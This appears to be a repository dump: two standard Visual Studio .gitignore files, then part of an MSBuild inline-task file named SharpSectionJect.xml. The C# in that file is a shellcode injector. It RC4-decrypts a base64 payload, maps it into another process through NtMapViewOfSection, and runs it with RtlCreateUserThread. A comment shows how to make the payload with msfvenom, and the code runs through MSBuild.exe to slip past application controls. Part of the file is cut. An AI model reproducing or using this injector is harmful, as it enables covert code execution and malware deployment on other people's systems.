Results 47 | [Tt]est[Rr]esult*/ 48 | [Bb]uild[Ll]og.* 49 | 50 | # NUnit 51 | *.VisualState.xml 52 | TestResult.xml 53 | nunit-*.xml 54 | 55 | # Build Results of an ATL Project 56 | [Dd]ebugPS/ 57 | [Rr]eleasePS/ 58 | dlldata.c 59 | 60 | # Benchmark Results 61 | BenchmarkDotNet.Artifacts/ 62 | 63 | # .NET Core 64 | project.lock.json 65 | project.fragment.lock.json 66 | artifacts/ 67 | 68 | # ASP.NET Scaffolding 69 | ScaffoldingReadMe.txt 70 | 71 | # StyleCop 72 | StyleCopReport.xml 73 | 74 | # Files built by Visual Studio 75 | *_i.c 76 | *_p.c 77 | *_h.h 78 | *.ilk 79 | *.meta 80 | *.obj 81 | *.iobj 82 | *.pch 83 | *.pdb 84 | *.ipdb 85 | *.pgc 86 | *.pgd 87 | *.rsp 88 | *.sbr 89 | *.tlb 90 | *.tli 91 | *.tlh 92 | *.tmp 93 | *.tmp_proj 94 | *_wpftmp.csproj 95 | *.log 96 | *.tlog 97 | *.vspscc 98 | *.vssscc 99 | .builds 100 | *.pidb 101 | *.svclog 102 | *.scc 103 | 104 | # Chutzpah Test files 105 | _Chutzpah* 106 | 107 | # Visual C++ cache files 108 | ipch/ 109 | *.aps 110 | *.ncb 111 | *.opendb 112 | *.opensdf 113 | *.sdf 114 | *.cachefile 115 | *.VC.db 116 | *.VC.VC.opendb 117 | 118 | # Visual Studio profiler 119 | *.psess 120 | *.vsp 121 | *.vspx 122 | *.sap 123 | 124 | # Visual Studio Trace Files 125 | *.e2e 126 | 127 | # TFS 2012 Local Workspace 128 | $tf/ 129 | 130 | # Guidance Automation Toolkit 131 | *.gpState 132 | 133 | # ReSharper is a .NET coding add-in 134 | _ReSharper*/ 135 | *.[Rr]e[Ss]harper 136 | *.DotSettings.user 137 | 138 | # TeamCity is a build add-in 139 | _TeamCity* 140 | 141 | # DotCover is a Code Coverage Tool 142 | *.dotCover 143 | 144 | # AxoCover is a Code Coverage Tool 145 | .axoCover/* 146 | !.axoCover/settings.json 147 | 148 | # Coverlet is a free, cross platform Code Coverage Tool 149 | coverage*.json 150 | coverage*.xml 151 | coverage*.info 152 | 153 | # Visual Studio code coverage results 154 | *.coverage 155 | *.coveragexml 156 | 157 | # NCrunch 158 | _NCrunch_* 159 | .*crunch*.local.xml 160 | nCrunchTemp_* 161 | 162 | # MightyMoose 163 | *.mm.* 164 | AutoTest.Net/ 165 | 166 | # Web workbench (sass) 167 | .sass-cache/ 168 | 169 | # Installshield output folder 170 | [Ee]xpress/ 171 | 172 | # DocProject is a documentation generator add-in 173 | DocProject/buildhelp/ 174 | DocProject/Help/*.HxT 175 | DocProject/Help/*.HxC 176 | DocProject/Help/*.hhc 177 | DocProject/Help/*.hhk 178 | DocProject/Help/*.hhp 179 | DocProject/Help/Html2 180 | DocProject/Help/html 181 | 182 | # Click-Once directory 183 | publish/ 184 | 185 | # Publish Web Output 186 | *.[Pp]ublish.xml 187 | *.azurePubxml 188 | # Note: Comment the next line if you want to checkin your web deploy settings, 189 | # but database connection strings (with potential passwords) will be unencrypted 190 | *.pubxml 191 | *.publishproj 192 | 193 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 194 | # checkin your Azure Web App publish settings, but sensitive information contained 195 | # in these scripts will be unencrypted 196 | PublishScripts/ 197 | 198 | # NuGet Packages 199 | *.nupkg 200 | # NuGet Symbol Packages 201 | *.snupkg 202 | # The packages folder can be ignored because of Package Restore 203 | **/[Pp]ackages/* 204 | # except build/, which is used as an MSBuild target. 205 | !**/[Pp]ackages/build/ 206 | # Uncomment if necessary however generally it will be regenerated when needed 207 | #!**/[Pp]ackages/repositories.config 208 | # NuGet v3's project.json files produces more ignorable files 209 | *.nuget.props 210 | *.nuget.targets 211 | 212 | # Nuget personal access tokens and Credentials 213 | nuget.config 214 | 215 | # Microsoft Azure Build Output 216 | csx/ 217 | *.build.csdef 218 | 219 | # Microsoft Azure Emulator 220 | ecf/ 221 | rcf/ 222 | 223 | # Windows Store app package directories and files 224 | AppPackages/ 225 | BundleArtifacts/ 226 | Package.StoreAssociation.xml 227 | _pkginfo.txt 228 | *.appx 229 | *.appxbundle 230 | *.appxupload 231 | 232 | # Visual Studio cache files 233 | # files ending in .cache can be ignored 234 | *.[Cc]ache 235 | # but keep track of directories ending in .cache 236 | !?*.[Cc]ache/ 237 | 238 | # Others 239 | ClientBin/ 240 | ~$* 241 | *~ 242 | *.dbmdl 243 | *.dbproj.schemaview 244 | *.jfm 245 | *.pfx 246 | *.publishsettings 247 | orleans.codegen.cs 248 | 249 | # Including strong name files can present a security risk 250 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 251 | #*.snk 252 | 253 | # Since there are multiple workflows, uncomment next line to ignore bower_components 254 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 255 | #bower_components/ 256 | 257 | # RIA/Silverlight projects 258 | Generated_Code/ 259 | 260 | # Backup & report files from converting an old project file 261 | # to a newer Visual Studio version. Backup files are not needed, 262 | # because we have git ;-) 263 | _UpgradeReport_Files/ 264 | Backup*/ 265 | UpgradeLog*.XML 266 | UpgradeLog*.htm 267 | ServiceFabricBackup/ 268 | *.rptproj.bak 269 | 270 | # SQL Server files 271 | *.mdf 272 | *.ldf 273 | *.ndf 274 | 275 | # Business Intelligence projects 276 | *.rdl.data 277 | *.bim.layout 278 | *.bim_*.settings 279 | *.rptproj.rsuser 280 | *- [Bb]ackup.rdl 281 | *- [Bb]ackup ([0-9]).rdl 282 | *- [Bb]ackup ([0-9][0-9]).rdl 283 | 284 | # Microsoft Fakes 285 | FakesAssemblies/ 286 | 287 | # GhostDoc plugin setting file 288 | *.GhostDoc.xml 289 | 290 | # Node.js Tools for Visual Studio 291 | .ntvs_analysis.dat 292 | node_modules/ 293 | 294 | # Visual Studio 6 build log 295 | *.plg 296 | 297 | # Visual Studio 6 workspace options file 298 | *.opt 299 | 300 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 301 | *.vbw 302 | 303 | # Visual Studio LightSwitch build output 304 | **/*.HTMLClient/GeneratedArtifacts 305 | **/*.DesktopClient/GeneratedArtifacts 306 | **/*.DesktopClient/ModelManifest.xml 307 | **/*.Server/GeneratedArtifacts 308 | **/*.Server/ModelManifest.xml 309 | _Pvt_Extensions 310 | 311 | # Paket dependency manager 312 | .paket/paket.exe 313 | paket-files/ 314 | 315 | # FAKE - F# Make 316 | .fake/ 317 | 318 | # CodeRush personal settings 319 | .cr/personal 320 | 321 | # Python Tools for Visual Studio (PTVS) 322 | __pycache__/ 323 | *.pyc 324 | 325 | # Cake - Uncomment if you are using it 326 | # tools/** 327 | # !tools/packages.config 328 | 329 | # Tabs Studio 330 | *.tss 331 | 332 | # Telerik's JustMock configuration file 333 | *.jmconfig 334 | 335 | # BizTalk build output 336 | *.btp.cs 337 | *.btm.cs 338 | *.odx.cs 339 | *.xsd.cs 340 | 341 | # OpenCover UI analysis results 342 | OpenCover/ 343 | 344 | # Azure Stream Analytics local run output 345 | ASALocalRun/ 346 | 347 | # MSBuild Binary and Structured Log 348 | *.binlog 349 | 350 | # NVidia Nsight GPU debugger configuration file 351 | *.nvuser 352 | 353 | # MFractors (Xamarin productivity tool) working folder 354 | .mfractor/ 355 | 356 | # Local History for Visual Studio 357 | .localhistory/ 358 | 359 | # BeatPulse healthcheck temp database 360 | healthchecksdb 361 | 362 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 363 | MigrationBackup/ 364 | 365 | # Ionide (cross platform F# VS Code tools) working folder 366 | .ionide/ 367 | 368 | # Fody - auto-generated XML schema 369 | FodyWeavers.xsd 370 | 371 | # VS Code files for those working on multiple tools 372 | .vscode/* 373 | !.vscode/settings.json 374 | !.vscode/tasks.json 375 | !.vscode/launch.json 376 | !.vscode/extensions.json 377 | *.code-workspace 378 | 379 | # Local History for Visual Studio Code 380 | .history/ 381 | 382 | # Windows Installer files from build outputs 383 | *.cab 384 | *.msi 385 | *.msix 386 | *.msm 387 | *.msp 388 | 389 | # JetBrains Rider 390 | .idea/ 391 | *.sln.iml -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | *.bin 7 | *.pem 8 | 9 | # User-specific files 10 | *.rsuser 11 | *.suo 12 | *.user 13 | *.userosscache 14 | *.sln.docstates 15 | 16 | # User-specific files (MonoDevelop/Xamarin Studio) 17 | *.userprefs 18 | 19 | # Mono auto generated files 20 | mono_crash.* 21 | 22 | # Build results 23 | [Dd]ebug/ 24 | [Dd]ebugPublic/ 25 | [Rr]elease/ 26 | [Rr]eleases/ 27 | x64/ 28 | x86/ 29 | [Ww][Ii][Nn]32/ 30 | [Aa][Rr][Mm]/ 31 | [Aa][Rr][Mm]64/ 32 | bld/ 33 | [Bb]in/ 34 | [Oo]bj/ 35 | [Ll]og/ 36 | [Ll]ogs/ 37 | 38 | # Visual Studio 2015/2017 cache/options directory 39 | .vs/ 40 | # Uncomment if you have tasks that create the project's static files in wwwroot 41 | #wwwroot/ 42 | 43 | # Visual Studio 2017 auto generated files 44 | Generated\ Files/ 45 | 46 | # MSTest test Results 47 | [Tt]est[Rr]esult*/ 48 | [Bb]uild[Ll]og.* 49 | 50 | # NUnit 51 | *.VisualState.xml 52 | TestResult.xml 53 | nunit-*.xml 54 | 55 | # Build Results of an ATL Project 56 | [Dd]ebugPS/ 57 | [Rr]eleasePS/ 58 | dlldata.c 59 | 60 | # Benchmark Results 61 | BenchmarkDotNet.Artifacts/ 62 | 63 | # .NET Core 64 | project.lock.json 65 | project.fragment.lock.json 66 | artifacts/ 67 | 68 | # ASP.NET Scaffolding 69 | ScaffoldingReadMe.txt 70 | 71 | # StyleCop 72 | StyleCopReport.xml 73 | 74 | # Files built by Visual Studio 75 | *_i.c 76 | *_p.c 77 | *_h.h 78 | *.ilk 79 | *.meta 80 | *.obj 81 | *.iobj 82 | *.pch 83 | *.pdb 84 | *.ipdb 85 | *.pgc 86 | *.pgd 87 | *.rsp 88 | *.sbr 89 | *.tlb 90 | *.tli 91 | *.tlh 92 | *.tmp 93 | *.tmp_proj 94 | *_wpftmp.csproj 95 | *.log 96 | *.tlog 97 | *.vspscc 98 | *.vssscc 99 | .builds 100 | *.pidb 101 | *.svclog 102 | *.scc 103 | 104 | # Chutzpah Test files 105 | _Chutzpah* 106 | 107 | # Visual C++ cache files 108 | ipch/ 109 | *.aps 110 | *.ncb 111 | *.opendb 112 | *.opensdf 113 | *.sdf 114 | *.cachefile 115 | *.VC.db 116 | *.VC.VC.opendb 117 | 118 | # Visual Studio profiler 119 | *.psess 120 | *.vsp 121 | *.vspx 122 | *.sap 123 | 124 | # Visual Studio Trace Files 125 | *.e2e 126 | 127 | # TFS 2012 Local Workspace 128 | $tf/ 129 | 130 | # Guidance Automation Toolkit 131 | *.gpState 132 | 133 | # ReSharper is a .NET coding add-in 134 | _ReSharper*/ 135 | *.[Rr]e[Ss]harper 136 | *.DotSettings.user 137 | 138 | # TeamCity is a build add-in 139 | _TeamCity* 140 | 141 | # DotCover is a Code Coverage Tool 142 | *.dotCover 143 | 144 | # AxoCover is a Code Coverage Tool 145 | .axoCover/* 146 | !.axoCover/settings.json 147 | 148 | # Coverlet is a free, cross platform Code Coverage Tool 149 | coverage*.json 150 | coverage*.xml 151 | coverage*.info 152 | 153 | # Visual Studio code coverage results 154 | *.coverage 155 | *.coveragexml 156 | 157 | # NCrunch 158 | _NCrunch_* 159 | .*crunch*.local.xml 160 | nCrunchTemp_* 161 | 162 | # MightyMoose 163 | *.mm.* 164 | AutoTest.Net/ 165 | 166 | # Web workbench (sass) 167 | .sass-cache/ 168 | 169 | # Installshield output folder 170 | [Ee]xpress/ 171 | 172 | # DocProject is a documentation generator add-in 173 | DocProject/buildhelp/ 174 | DocProject/Help/*.HxT 175 | DocProject/Help/*.HxC 176 | DocProject/Help/*.hhc 177 | DocProject/Help/*.hhk 178 | DocProject/Help/*.hhp 179 | DocProject/Help/Html2 180 | DocProject/Help/html 181 | 182 | # Click-Once directory 183 | publish/ 184 | 185 | # Publish Web Output 186 | *.[Pp]ublish.xml 187 | *.azurePubxml 188 | # Note: Comment the next line if you want to checkin your web deploy settings, 189 | # but database connection strings (with potential passwords) will be unencrypted 190 | *.pubxml 191 | *.publishproj 192 | 193 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 194 | # checkin your Azure Web App publish settings, but sensitive information contained 195 | # in these scripts will be unencrypted 196 | PublishScripts/ 197 | 198 | # NuGet Packages 199 | *.nupkg 200 | # NuGet Symbol Packages 201 | *.snupkg 202 | # The packages folder can be ignored because of Package Restore 203 | **/[Pp]ackages/* 204 | # except build/, which is used as an MSBuild target. 205 | !**/[Pp]ackages/build/ 206 | # Uncomment if necessary however generally it will be regenerated when needed 207 | #!**/[Pp]ackages/repositories.config 208 | # NuGet v3's project.json files produces more ignorable files 209 | *.nuget.props 210 | *.nuget.targets 211 | 212 | # Nuget personal access tokens and Credentials 213 | nuget.config 214 | 215 | # Microsoft Azure Build Output 216 | csx/ 217 | *.build.csdef 218 | 219 | # Microsoft Azure Emulator 220 | ecf/ 221 | rcf/ 222 | 223 | # Windows Store app package directories and files 224 | AppPackages/ 225 | BundleArtifacts/ 226 | Package.StoreAssociation.xml 227 | _pkginfo.txt 228 | *.appx 229 | *.appxbundle 230 | *.appxupload 231 | 232 | # Visual Studio cache files 233 | # files ending in .cache can be ignored 234 | *.[Cc]ache 235 | # but keep track of directories ending in .cache 236 | !?*.[Cc]ache/ 237 | 238 | # Others 239 | ClientBin/ 240 | ~$* 241 | *~ 242 | *.dbmdl 243 | *.dbproj.schemaview 244 | *.jfm 245 | *.pfx 246 | *.publishsettings 247 | orleans.codegen.cs 248 | 249 | # Including strong name files can present a security risk 250 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 251 | #*.snk 252 | 253 | # Since there are multiple workflows, uncomment next line to ignore bower_components 254 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 255 | #bower_components/ 256 | 257 | # RIA/Silverlight projects 258 | Generated_Code/ 259 | 260 | # Backup & report files from converting an old project file 261 | # to a newer Visual Studio version. Backup files are not needed, 262 | # because we have git ;-) 263 | _UpgradeReport_Files/ 264 | Backup*/ 265 | UpgradeLog*.XML 266 | UpgradeLog*.htm 267 | ServiceFabricBackup/ 268 | *.rptproj.bak 269 | 270 | # SQL Server files 271 | *.mdf 272 | *.ldf 273 | *.ndf 274 | 275 | # Business Intelligence projects 276 | *.rdl.data 277 | *.bim.layout 278 | *.bim_*.settings 279 | *.rptproj.rsuser 280 | *- [Bb]ackup.rdl 281 | *- [Bb]ackup ([0-9]).rdl 282 | *- [Bb]ackup ([0-9][0-9]).rdl 283 | 284 | # Microsoft Fakes 285 | FakesAssemblies/ 286 | 287 | # GhostDoc plugin setting file 288 | *.GhostDoc.xml 289 | 290 | # Node.js Tools for Visual Studio 291 | .ntvs_analysis.dat 292 | node_modules/ 293 | 294 | # Visual Studio 6 build log 295 | *.plg 296 | 297 | # Visual Studio 6 workspace options file 298 | *.opt 299 | 300 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 301 | *.vbw 302 | 303 | # Visual Studio LightSwitch build output 304 | **/*.HTMLClient/GeneratedArtifacts 305 | **/*.DesktopClient/GeneratedArtifacts 306 | **/*.DesktopClient/ModelManifest.xml 307 | **/*.Server/GeneratedArtifacts 308 | **/*.Server/ModelManifest.xml 309 | _Pvt_Extensions 310 | 311 | # Paket dependency manager 312 | .paket/paket.exe 313 | paket-files/ 314 | 315 | # FAKE - F# Make 316 | .fake/ 317 | 318 | # CodeRush personal settings 319 | .cr/personal 320 | 321 | # Python Tools for Visual Studio (PTVS) 322 | __pycache__/ 323 | *.pyc 324 | 325 | # Cake - Uncomment if you are using it 326 | # tools/** 327 | # !tools/packages.config 328 | 329 | # Tabs Studio 330 | *.tss 331 | 332 | # Telerik's JustMock configuration file 333 | *.jmconfig 334 | 335 | # BizTalk build output 336 | *.btp.cs 337 | *.btm.cs 338 | *.odx.cs 339 | *.xsd.cs 340 | 341 | # OpenCover UI analysis results 342 | OpenCover/ 343 | 344 | # Azure Stream Analytics local run output 345 | ASALocalRun/ 346 | 347 | # MSBuild Binary and Structured Log 348 | *.binlog 349 | 350 | # NVidia Nsight GPU debugger configuration file 351 | *.nvuser 352 | 353 | # MFractors (Xamarin productivity tool) working folder 354 | .mfractor/ 355 | 356 | # Local History for Visual Studio 357 | .localhistory/ 358 | 359 | # BeatPulse healthcheck temp database 360 | healthchecksdb 361 | 362 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 363 | MigrationBackup/ 364 | 365 | # Ionide (cross platform F# VS Code tools) working folder 366 | .ionide/ 367 | 368 | # Fody - auto-generated XML schema 369 | FodyWeavers.xsd 370 | 371 | # VS Code files for those working on multiple tools 372 | .vscode/* 373 | !.vscode/settings.json 374 | !.vscode/tasks.json 375 | !.vscode/launch.json 376 | !.vscode/extensions.json 377 | *.code-workspace 378 | 379 | # Local History for Visual Studio Code 380 | .history/ 381 | 382 | # Windows Installer files from build outputs 383 | *.cab 384 | *.msi 385 | *.msix 386 | *.msm 387 | *.msp 388 | 389 | # JetBrains Rider 390 | .idea/ 391 | *.sln.iml 392 | 393 | -------------------------------------------------------------------------------- /Ballista/.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Ll]og/ 33 | [Ll]ogs/ 34 | 35 | # Visual Studio 2015/2017 cache/options directory 36 | .vs/ 37 | # Uncomment if you have tasks that create the project's static files in wwwroot 38 | #wwwroot/ 39 | 40 | # Visual Studio 2017 auto generated files 41 | Generated\ Files/ 42 | 43 | # MSTest test Results 44 | [Tt]est[Rr]esult*/ 45 | [Bb]uild[Ll]og.* 46 | 47 | # NUnit 48 | *.VisualState.xml 49 | TestResult.xml 50 | nunit-*.xml 51 | 52 | # Build Results of an ATL Project 53 | [Dd]ebugPS/ 54 | [Rr]eleasePS/ 55 | dlldata.c 56 | 57 | # Benchmark Results 58 | BenchmarkDotNet.Artifacts/ 59 | 60 | # .NET Core 61 | project.lock.json 62 | project.fragment.lock.json 63 | artifacts/ 64 | 65 | # ASP.NET Scaffolding 66 | ScaffoldingReadMe.txt 67 | 68 | # StyleCop 69 | StyleCopReport.xml 70 | 71 | # Files built by Visual Studio 72 | *_i.c 73 | *_p.c 74 | *_h.h 75 | *.ilk 76 | *.meta 77 | *.obj 78 | *.iobj 79 | *.pch 80 | *.pdb 81 | *.ipdb 82 | *.pgc 83 | *.pgd 84 | *.rsp 85 | *.sbr 86 | *.tlb 87 | *.tli 88 | *.tlh 89 | *.tmp 90 | *.tmp_proj 91 | *_wpftmp.csproj 92 | *.log 93 | *.tlog 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Nuget personal access tokens and Credentials 210 | nuget.config 211 | 212 | # Microsoft Azure Build Output 213 | csx/ 214 | *.build.csdef 215 | 216 | # Microsoft Azure Emulator 217 | ecf/ 218 | rcf/ 219 | 220 | # Windows Store app package directories and files 221 | AppPackages/ 222 | BundleArtifacts/ 223 | Package.StoreAssociation.xml 224 | _pkginfo.txt 225 | *.appx 226 | *.appxbundle 227 | *.appxupload 228 | 229 | # Visual Studio cache files 230 | # files ending in .cache can be ignored 231 | *.[Cc]ache 232 | # but keep track of directories ending in .cache 233 | !?*.[Cc]ache/ 234 | 235 | # Others 236 | ClientBin/ 237 | ~$* 238 | *~ 239 | *.dbmdl 240 | *.dbproj.schemaview 241 | *.jfm 242 | *.pfx 243 | *.publishsettings 244 | orleans.codegen.cs 245 | 246 | # Including strong name files can present a security risk 247 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 248 | #*.snk 249 | 250 | # Since there are multiple workflows, uncomment next line to ignore bower_components 251 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 252 | #bower_components/ 253 | 254 | # RIA/Silverlight projects 255 | Generated_Code/ 256 | 257 | # Backup & report files from converting an old project file 258 | # to a newer Visual Studio version. Backup files are not needed, 259 | # because we have git ;-) 260 | _UpgradeReport_Files/ 261 | Backup*/ 262 | UpgradeLog*.XML 263 | UpgradeLog*.htm 264 | ServiceFabricBackup/ 265 | *.rptproj.bak 266 | 267 | # SQL Server files 268 | *.mdf 269 | *.ldf 270 | *.ndf 271 | 272 | # Business Intelligence projects 273 | *.rdl.data 274 | *.bim.layout 275 | *.bim_*.settings 276 | *.rptproj.rsuser 277 | *- [Bb]ackup.rdl 278 | *- [Bb]ackup ([0-9]).rdl 279 | *- [Bb]ackup ([0-9][0-9]).rdl 280 | 281 | # Microsoft Fakes 282 | FakesAssemblies/ 283 | 284 | # GhostDoc plugin setting file 285 | *.GhostDoc.xml 286 | 287 | # Node.js Tools for Visual Studio 288 | .ntvs_analysis.dat 289 | node_modules/ 290 | 291 | # Visual Studio 6 build log 292 | *.plg 293 | 294 | # Visual Studio 6 workspace options file 295 | *.opt 296 | 297 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 298 | *.vbw 299 | 300 | # Visual Studio LightSwitch build output 301 | **/*.HTMLClient/GeneratedArtifacts 302 | **/*.DesktopClient/GeneratedArtifacts 303 | **/*.DesktopClient/ModelManifest.xml 304 | **/*.Server/GeneratedArtifacts 305 | **/*.Server/ModelManifest.xml 306 | _Pvt_Extensions 307 | 308 | # Paket dependency manager 309 | .paket/paket.exe 310 | paket-files/ 311 | 312 | # FAKE - F# Make 313 | .fake/ 314 | 315 | # CodeRush personal settings 316 | .cr/personal 317 | 318 | # Python Tools for Visual Studio (PTVS) 319 | __pycache__/ 320 | *.pyc 321 | 322 | # Cake - Uncomment if you are using it 323 | # tools/** 324 | # !tools/packages.config 325 | 326 | # Tabs Studio 327 | *.tss 328 | 329 | # Telerik's JustMock configuration file 330 | *.jmconfig 331 | 332 | # BizTalk build output 333 | *.btp.cs 334 | *.btm.cs 335 | *.odx.cs 336 | *.xsd.cs 337 | 338 | # OpenCover UI analysis results 339 | OpenCover/ 340 | 341 | # Azure Stream Analytics local run output 342 | ASALocalRun/ 343 | 344 | # MSBuild Binary and Structured Log 345 | *.binlog 346 | 347 | # NVidia Nsight GPU debugger configuration file 348 | *.nvuser 349 | 350 | # MFractors (Xamarin productivity tool) working folder 351 | .mfractor/ 352 | 353 | # Local History for Visual Studio 354 | .localhistory/ 355 | 356 | # BeatPulse healthcheck temp database 357 | healthchecksdb 358 | 359 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 360 | MigrationBackup/ 361 | 362 | # Ionide (cross platform F# VS Code tools) working folder 363 | .ionide/ 364 | 365 | # Fody - auto-generated XML schema 366 | FodyWeavers.xsd 367 | 368 | # VS Code files for those working on multiple tools 369 | .vscode/* 370 | !.vscode/settings.json 371 | !.vscode/tasks.json 372 | !.vscode/launch.json 373 | !.vscode/extensions.json 374 | *.code-workspace 375 | 376 | # Local History for Visual Studio Code 377 | .history/ 378 | 379 | # Windows Installer files from build outputs 380 | *.cab 381 | *.msi 382 | *.msix 383 | *.msm 384 | *.msp 385 | 386 | # JetBrains Rider 387 | .idea/ 388 | *.sln.iml 389 | 390 | # VsCode 391 | .vscode/* 392 | !.vscode/settings.json 393 | !.vscode/tasks.json 394 | !.vscode/launch.json 395 | !.vscode/extensions.json 396 | *.code-workspace 397 | 398 | # Local History for Visual Studio Code 399 | .history/ -------------------------------------------------------------------------------- /SharpSectionJect/SharpSectionJectMsBuild/SharpSectionJect.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 9 | 10 |


 11 | 				= 1)
 94 |                                     {
 95 |                                         foreach (System.Diagnostics.Process proc in processes)
 96 |                                         {
 97 |                                             if (proc.SessionId == currProcSessionId)
 98 |                                             {
 99 |                                                 tPid = proc.Id;
100 |                                                 break;
101 |                                             }
102 |                                         }
103 |                                     }
104 |                                 }
105 | 
106 |                                 if (tPid >= 0)
107 |                                 {
108 |                                     IntPtr targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, tPid);
109 | 
110 |                                     if (targetHandle != IntPtr.Zero)
111 |                                     {
112 |                                         NtMapViewOfSection(sectionHandle, targetHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ);
113 | 
114 |                                         byte[] b64 = RC4(System.Text.Encoding.UTF8.GetBytes(args[2]), Convert.FromBase64String(args[1]));
115 |                                         Marshal.Copy(b64, 0, localSectionAddress, b64.Length);
116 | 
117 |                                         IntPtr targetThreadHandle = IntPtr.Zero;
118 |                                         RtlCreateUserThread(targetHandle, IntPtr.Zero, false, 0, IntPtr.Zero, IntPtr.Zero, remoteSectionAddress, IntPtr.Zero, ref targetThreadHandle, IntPtr.Zero);
119 |                                     }
120 |                                     else
121 |                                         Console.WriteLine("Failed to open target process");
122 |                                 }
123 |                                 else
124 |                                     Console.WriteLine("Process with the name / PID of " + tPid + " is invalid.");
125 |                             }
126 |                             else
127 |                                 Console.WriteLine(@"Usage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe SharpSectionJect.xml");
128 |                                //msfvenom -p windows/x64/exec CMD=calc.exe -f raw EXITFUNC=thread | base64 -w0
129 |                         }
130 | 
131 |                         [DllImport("kernel32.dll", SetLastError = true)]
132 |                         private static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);
133 | 
134 |                         [DllImport("ntdll.dll", SetLastError = true, ExactSpelling = true)]
135 |                         private static extern UInt32 NtCreateSection(ref IntPtr SectionHandle, UInt32 DesiredAccess, IntPtr ObjectAttributes, ref UInt32 MaximumSize, UInt32 SectionPageProtection, UInt32 AllocationAttributes, IntPtr FileHandle);
136 | 
137 |                         [DllImport("ntdll.dll", SetLastError = true)]
138 |                         private static extern uint NtMapViewOfSection(IntPtr SectionHandle, IntPtr ProcessHandle, ref IntPtr BaseAddress, UIntPtr ZeroBits, UIntPtr CommitSize, out ulong SectionOffset, out uint ViewSize, uint InheritDisposition, uint AllocationType, uint Win32Protect);
139 | 
